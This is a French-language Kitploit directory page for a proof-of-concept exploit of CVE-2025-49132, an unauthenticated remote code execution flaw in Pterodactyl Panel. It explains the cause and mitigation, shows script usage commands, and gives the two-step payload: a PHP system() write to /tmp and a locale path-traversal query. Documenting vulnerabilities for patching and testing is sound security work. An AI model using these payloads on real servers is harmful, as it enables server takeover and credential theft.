Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-49132-Pterodactyl-Panel-Unauthenticated-Remote-Code-Execution-RCE- — Exploit PoC pour CVE-2025-49132 (GHSA-24wv-6c99-f843) – Exécution de code à distance non authentifiée dans Pterodactyl Panel ≤ 1.11.10 | Kitploit
Outils/GitHubGitHub/dollarboysushil/cve-2025-49132-pterodactyl-panel-unauthenticated-remote-code-execution-rce-
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubdollarboysushil/cve-2025-49132-pterodactyl-panel-unauthenticated-remote-code-execution-rce-

CVE-2025-49132-Pterodactyl-Panel-Unauthenticated-Remote-Code-Execution-RCE-

Exploit PoC pour CVE-2025-49132 (GHSA-24wv-6c99-f843) – Exécution de code à distance non authentifiée dans Pterodactyl Panel ≤ 1.11.10

Voir le dépôtSite web
31il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-49132

Pterodactyl Panel - Exécution de code à distance non authentifiée (RCE)


🔎 Résumé

CVE‑2025‑49132 est une vulnérabilité critique d'exécution de code à distance affectant Pterodactyl Panel <= 1.11.10.

Un attaquant non authentifié peut exploiter une validation d'entrée inadéquate dans le point de terminaison /locales/locale.json pour exécuter des commandes système arbitraires.

Corrigé dans la version : 1.11.11


📌 Impact

Une exploitation réussie permet :

  • Exécution de code à distance non authentifiée
  • Lecture de fichiers sensibles (par ex. .env)
  • Extraction d'identifiants de base de données
  • Compromission totale du serveur

Sévérité : Critique


🧠 Cause racine

La vulnérabilité résulte d'une validation inadéquate de :

  • paramètre locale
  • paramètre namespace

Un attaquant peut :

  1. Abuser de la traversée de répertoire (../../../../../)
  2. Exploiter config-create
  3. Écrire des charges utiles PHP arbitraires dans /tmp
  4. Déclencher l'exécution via un chargement de namespace spécialement conçu

Classification de la faiblesse : CWE-94 -- Contrôle inadéquat de la génération de code


🚀 Preuve de concept (PoC)

Utilisation

root@kitploit:~
python3 CVE-2025-49132-dbs.py --target <host> --cmd "<command>" [--path <pear_path>]

Exemples

root@kitploit:~
python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR

Chemin par défaut :

root@kitploit:~
/usr/share/php/PEAR

Obtenez le chemin correct depuis la page /phpinfo.php alt text


🛠 Processus d'exploitation

Étape 1 - Écrire la charge utile

L'attaquant injecte une charge utile PHP malveillante dans /tmp/payload.php en utilisant :

root@kitploit:~
/<?=system('id')?>+/tmp/payload.php

Étape 2 --- Déclencher l'exécution

En appelant :

root@kitploit:~
?locale=../../../../../tmp&namespace=payload

Le serveur exécute le PHP injecté.

alt text

🛡 Atténuation

  • Mettre à niveau vers Pterodactyl Panel >= 1.11.11
  • Nettoyer les entrées locale et namespace
  • Désactiver les fonctions PHP dangereuses
  • Restreindre l'exposition inutile des points de terminaison

📚 Références

  • Avis GitHub : GHSA-24wv-6c99-f843
  • CVE-2025-49132
  • Commit du correctif Pterodactyl Panel v1.11.11

Télécharger l’outil